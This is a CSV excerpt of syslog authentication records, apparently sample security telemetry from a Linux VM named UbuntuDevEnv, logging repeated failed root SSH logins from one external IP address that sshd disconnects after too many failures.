+8172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:29,UbuntuDevEnv,2019-06-11 18:56:29,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 29906 ssh2,38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,29906,,
+8173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:44,UbuntuDevEnv,2019-06-11 18:56:44,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 29906: Too many authentication failures [preauth],38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,29906,,
+8174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:44,UbuntuDevEnv,2019-06-11 18:56:44,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 29906 ssh2],38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,29906,,
+8175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:44,UbuntuDevEnv,2019-06-11 18:56:44,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 29906 ssh2 [preauth],38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,29906,,
+8176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:44,UbuntuDevEnv,2019-06-11 18:56:44,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:44,UbuntuDevEnv,2019-06-11 18:56:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:48,UbuntuDevEnv,2019-06-11 18:56:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:50,UbuntuDevEnv,2019-06-11 18:56:50,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 37356 ssh2,38402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,37356,,
+8180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:01,UbuntuDevEnv,2019-06-11 18:56:59,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 61.177.172.128 port 37356 ssh2],38402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,37356,,
+8181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:02,UbuntuDevEnv,2019-06-11 18:57:01,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 37356 ssh2,38402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,37356,,
+8182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:05,UbuntuDevEnv,2019-06-11 18:57:04,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:05,UbuntuDevEnv,2019-06-11 18:57:04,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 37356: Too many authentication failures [preauth],38402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,37356,,
+8184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:05,UbuntuDevEnv,2019-06-11 18:57:04,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 37356 ssh2,38402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,37356,,
+8185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:05,UbuntuDevEnv,2019-06-11 18:57:04,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:05,UbuntuDevEnv,2019-06-11 18:57:04,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 37356 ssh2 [preauth],38402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,37356,,
+8187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:09,UbuntuDevEnv,2019-06-11 18:57:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:12,UbuntuDevEnv,2019-06-11 18:57:11,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 44636 ssh2,38475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,44636,,
+8189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:26,UbuntuDevEnv,2019-06-11 18:57:25,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 44636: Too many authentication failures [preauth],38475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,44636,,
+8190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:26,UbuntuDevEnv,2019-06-11 18:57:25,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:26,UbuntuDevEnv,2019-06-11 18:57:25,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:26,UbuntuDevEnv,2019-06-11 18:57:25,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 44636 ssh2],38475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,44636,,
+8193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:26,UbuntuDevEnv,2019-06-11 18:57:25,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 44636 ssh2 [preauth],38475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,44636,,
+8194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:29,UbuntuDevEnv,2019-06-11 18:57:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38555,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:32,UbuntuDevEnv,2019-06-11 18:57:31,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 52370 ssh2,38555,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,52370,,
+8196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:45,UbuntuDevEnv,2019-06-11 18:57:45,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 52370 ssh2],38555,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,52370,,
+8197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:45,UbuntuDevEnv,2019-06-11 18:57:45,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 52370: Too many authentication failures [preauth],38555,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,52370,,
+8198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:45,UbuntuDevEnv,2019-06-11 18:57:45,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38555,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:45,UbuntuDevEnv,2019-06-11 18:57:45,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 52370 ssh2 [preauth],38555,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,52370,,
+8200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:45,UbuntuDevEnv,2019-06-11 18:57:45,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38555,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:49,UbuntuDevEnv,2019-06-11 18:57:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:57:51,UbuntuDevEnv,2019-06-11 18:57:51,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 59684 ssh2,38620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,59684,,
+8203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:01,UbuntuDevEnv,2019-06-11 18:57:59,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 61.177.172.128 port 59684 ssh2],38620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,59684,,
+8204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:02,UbuntuDevEnv,2019-06-11 18:58:02,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 59684 ssh2,38620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,59684,,
+8205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:05,UbuntuDevEnv,2019-06-11 18:58:05,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 59684 ssh2 [preauth],38620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,59684,,
+8206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:05,UbuntuDevEnv,2019-06-11 18:58:05,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:05,UbuntuDevEnv,2019-06-11 18:58:05,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:05,UbuntuDevEnv,2019-06-11 18:58:05,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 59684: Too many authentication failures [preauth],38620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,59684,,
+8209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:05,UbuntuDevEnv,2019-06-11 18:58:05,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 59684 ssh2,38620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,59684,,
+8210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:09,UbuntuDevEnv,2019-06-11 18:58:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:11,UbuntuDevEnv,2019-06-11 18:58:11,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 2427 ssh2,38691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,2427,,
+8212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:26,UbuntuDevEnv,2019-06-11 18:58:25,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 2427 ssh2],38691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,2427,,
+8213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:26,UbuntuDevEnv,2019-06-11 18:58:25,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:26,UbuntuDevEnv,2019-06-11 18:58:25,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:26,UbuntuDevEnv,2019-06-11 18:58:25,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 2427 ssh2 [preauth],38691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,2427,,
+8216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:26,UbuntuDevEnv,2019-06-11 18:58:25,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 2427: Too many authentication failures [preauth],38691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,2427,,
+8217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:29,UbuntuDevEnv,2019-06-11 18:58:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:31,UbuntuDevEnv,2019-06-11 18:58:30,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 9888 ssh2,38770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,9888,,
+8219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:45,UbuntuDevEnv,2019-06-11 18:58:45,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:45,UbuntuDevEnv,2019-06-11 18:58:45,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 9888: Too many authentication failures [preauth],38770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,9888,,
+8221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:45,UbuntuDevEnv,2019-06-11 18:58:45,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:45,UbuntuDevEnv,2019-06-11 18:58:45,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 9888 ssh2],38770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,9888,,
+8223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:45,UbuntuDevEnv,2019-06-11 18:58:45,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 9888 ssh2 [preauth],38770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,9888,,
+8224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:49,UbuntuDevEnv,2019-06-11 18:58:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:58:50,UbuntuDevEnv,2019-06-11 18:58:50,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 17053 ssh2,38833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,17053,,
+8226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:01,UbuntuDevEnv,2019-06-11 18:58:58,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 61.177.172.128 port 17053 ssh2],38833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,17053,,
+8227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:01,UbuntuDevEnv,2019-06-11 18:59:01,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 17053 ssh2,38833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,17053,,
+8228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:04,UbuntuDevEnv,2019-06-11 18:59:03,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 17053 ssh2 [preauth],38833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,17053,,
+8229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:04,UbuntuDevEnv,2019-06-11 18:59:03,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 17053: Too many authentication failures [preauth],38833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,17053,,
+8230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:59:04,UbuntuDevEnv,2019-06-11 18:59:03,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 17053 ssh2,38833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,17053,,
